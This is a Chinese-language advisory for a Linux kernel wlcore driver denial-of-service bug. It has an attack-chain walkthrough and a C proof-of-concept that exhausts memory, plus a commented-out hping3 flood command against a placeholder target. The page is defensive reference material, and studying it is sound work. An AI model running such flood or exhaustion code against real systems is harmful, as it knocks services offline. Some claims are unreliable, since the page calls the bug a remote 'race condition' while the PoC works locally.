CVE-2026-31552 CVSS 7.5 高危

CVE-2026-31552: Linux内核wlcore驱动拒绝服务漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31552

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的wlcore驱动程序存在拒绝服务漏洞。当系统内存不足导致skb头部分配失败时，驱动错误地返回-EAGAIN而非-ENOMEM。这导致传输工作进入无限重试循环，占用CPU资源并引发系统软锁死，攻击者可利用此漏洞远程导致目标系统失去响应。

技术细节

该漏洞位于Linux内核的`drivers/net/wireless/ti/wlcore/tx.c`文件中。在`wl1271_tx_allocate`函数里，当`pskb_expand_head`因为内存不足（GFP_ATOMIC上下文）分配失败时，代码返回了`-EAGAIN`。然而，在`wlcore_tx_work_locked`函数中，返回值`-EAGAIN`被错误地解释为“聚合缓冲区已满”。这触发了清空缓冲区并将数据包重新放入队列头部的逻辑。由于此时持有`wl->mutex`锁，且代码在原子上下文中立即重试，导致系统陷入死循环，造成CPU软锁死，完全破坏了系统的可用性。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在运行受影响版本的Linux内核，并加载了wlcore WiFi驱动程序。

STEP 2

资源耗尽

攻击者通过网络向目标发送大量数据或运行恶意程序，耗尽系统的可用内存，使得内核在分配skb头部时倾向于失败。

STEP 3

触发漏洞

当wlcore驱动尝试传输数据包并调用`pskb_expand_head`时，由于内存不足返回失败。驱动错误地返回`-EAGAIN`，触发错误的错误处理逻辑。

STEP 4

拒绝服务

内核陷入无限的重试循环（死循环），导致CPU资源被耗尽，发生软锁死，系统无法处理其他请求。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-31552
 * This script attempts to exhaust memory and trigger network traffic
 * on a system using the wlcore driver to provoke the race condition.
 * Requires specific hardware (TI wlcore wifi) to be effective.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void consume_memory() {
    size_t block_size = 1024 * 1024; // 1MB
    void *ptr;
    printf("[*] Consuming memory to trigger GFP_ATOMIC failures...\n");
    while (1) {
        ptr = malloc(block_size);
        if (ptr == NULL) break;
        memset(ptr, 0, block_size);
    }
    printf("[*] Memory pressure applied.\n");
}

int main() {
    // Step 1: Consume memory to make pskb_expand_head likely to fail
    consume_memory();

    // Step 2: Normally one would flood the WiFi interface here.
    // e.g., using a packet generator like hping3 or custom raw sockets.
    printf("[*] Triggering network transmission loop...\n");
    // system("hping3 -i u1000 -S <target_ip>"); // Example
    
    printf("[*] If vulnerable, the kernel should soft lockup now.\n");
    return 0;
}

影响范围

Linux Kernel < v6.18.y (需参考具体commit修复情况)

防御指南

临时缓解措施

建议尽快应用官方发布的内核安全补丁。在无法立即重启升级的情况下，可以通过禁用受影响的wlcore WiFi网卡来临时规避风险，防止攻击者利用该漏洞导致系统崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表